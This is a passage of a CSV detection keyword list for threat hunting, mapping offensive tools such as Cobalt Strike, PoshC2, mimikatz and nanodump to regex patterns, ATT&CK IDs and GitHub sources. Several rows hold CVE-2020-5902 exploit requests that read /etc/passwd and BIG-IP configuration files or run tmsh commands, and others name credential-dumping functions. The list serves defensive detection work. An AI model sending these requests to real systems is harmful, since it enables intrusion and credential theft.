"*GenericC2Relay.cs*",".{0,1000}GenericC2Relay\.cs.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","10","10","204","46","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*Genetic-Malware/Ebowla*",".{0,1000}Genetic\-Malware\/Ebowla.{0,1000}","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","10","8","724","167","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" "*genMalDoc()*",".{0,1000}genMalDoc\(\).{0,1000}","offensive_tool_keyword","dropper","Generates Malicious 
Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*genmkvpwd *",".{0,1000}genmkvpwd\s.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*gentilkiwi (Benjamin DELPY)*",".{0,1000}gentilkiwi\s\(Benjamin\sDELPY\).{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*gentilkiwi*",".{0,1000}gentilkiwi.{0,1000}","offensive_tool_keyword","mimikatz","author of mimikatz and multiple other windows exploitation tools","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Georg is not 
ready, please check url*",".{0,1000}Georg\sis\snot\sready,\splease\scheck\surl.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","0","N/A","N/A","10","2936","814","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z" "*Georg says, 'All seems fine'*",".{0,1000}Georg\ssays,\s\'All\sseems\sfine\'.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","0","N/A","N/A","10","2936","814","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z" "*GeorgePatsias/ScareCrow*",".{0,1000}GeorgePatsias\/ScareCrow.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29","C2","https://github.com/GeorgePatsias/ScareCrow-CobaltStrike","1","1","N/A","10","10","446","69","2022-07-15T09:39:18Z","2021-06-24T10:04:01Z" "*georgesotiriadis/Chimera*",".{0,1000}georgesotiriadis\/Chimera.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","1","N/A","9","5","429","52","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z" "*geowordlists --postal-code 75001 --kilometers 25 --output-file /tmp/around_paris.txt*",".{0,1000}geowordlists\s\-\-postal\-code\s75001\s\-\-kilometers\s25\s\-\-output\-file\s\/tmp\/around_paris\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*GET */login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts*",".{0,1000}GET\s.{0,1000}\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/fileRead\.jsp\?fileName\=\/etc\/hosts.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/yasserjanah/CVE-2020-5902","1","0","N/A","N/A","1","40","14","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z" "*GET */tmui/login.jsp/.. 
/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf*",".{0,1000}GET\s.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/fileRead\.jsp\?fileName\=\/config\/bigip\.conf.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/yasserjanah/CVE-2020-5902","1","0","N/A","N/A","1","40","14","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z" "*GET */tmui/login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license*",".{0,1000}GET\s.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/fileRead\.jsp\?fileName\=\/config\/bigip\.license.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/yasserjanah/CVE-2020-5902","1","0","N/A","N/A","1","40","14","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z" "*GET */tmui/login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd*",".{0,1000}GET\s.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/fileRead\.jsp\?fileName\=\/etc\/passwd.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/yasserjanah/CVE-2020-5902","1","0","N/A","N/A","1","40","14","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z" "*GET */tmui/login.jsp/.. /tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin*",".{0,1000}GET\s.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/tmshCmd\.jsp\?command\=list\+auth\+user\+admin.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/yasserjanah/CVE-2020-5902","1","0","N/A","N/A","1","40","14","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z" "*GET *https://*/tmui/login.jsp/.. 
/tmui/locallb/workspace/tmshCmd.jsp?command=whoami*",".{0,1000}GET\s.{0,1000}https\:\/\/.{0,1000}\/tmui\/login\.jsp\/\.\.\s\/tmui\/locallb\/workspace\/tmshCmd\.jsp\?command\=whoami.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*get_beacon(*",".{0,1000}get_beacon\(.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*get_BeaconHealthCheck_settings*",".{0,1000}get_BeaconHealthCheck_settings.{0,1000}","offensive_tool_keyword","cobaltstrike","This aggressor script uses a beacon's note field to indicate the health status of a beacon.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/Cobalt-Strike/beacon_health_check","1","1","N/A","10","10","136","25","2021-09-29T20:20:52Z","2021-07-08T13:28:11Z" "*get_c2_messages*",".{0,1000}get_c2_messages.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*get_c2server_all*",".{0,1000}get_c2server_all.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*get_cmd_from_task_id*",".{0,1000}get_cmd_from_task_id.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - 
T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*get_dns_dnsidle*",".{0,1000}get_dns_dnsidle.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*get_dns_sleep*",".{0,1000}get_dns_sleep.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*Get_DPAPI_Protected_Files*",".{0,1000}Get_DPAPI_Protected_Files.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*get_filezilla_creds.rb*",".{0,1000}get_filezilla_creds\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*get_hijackeable_dllname*",".{0,1000}get_hijackeable_dllname.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*get_implants_all*",".{0,1000}get_implants_all.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*get_injection_techniques*",".{0,1000}get_injection_techniques.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 
TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*get_keystrokes.py*",".{0,1000}get_keystrokes\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*get_list_of_implant_text*",".{0,1000}get_list_of_implant_text.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*get_masterkeys_from_lsass*",".{0,1000}get_masterkeys_from_lsass.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*get_newimplanturl*",".{0,1000}get_newimplanturl.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*get_obfucation_string_dict*",".{0,1000}get_obfucation_string_dict.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*get_password_policy.x64.*",".{0,1000}get_password_policy\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" 
"*get_password_policy.x86.*",".{0,1000}get_password_policy\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*get_post_ex_pipename_list*",".{0,1000}get_post_ex_pipename_list.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 
- T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*get_post_ex_spawnto_x*",".{0,1000}get_post_ex_spawnto_x.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*get_process_inject_allocator*",".{0,1000}get_process_inject_allocator.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt 
Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 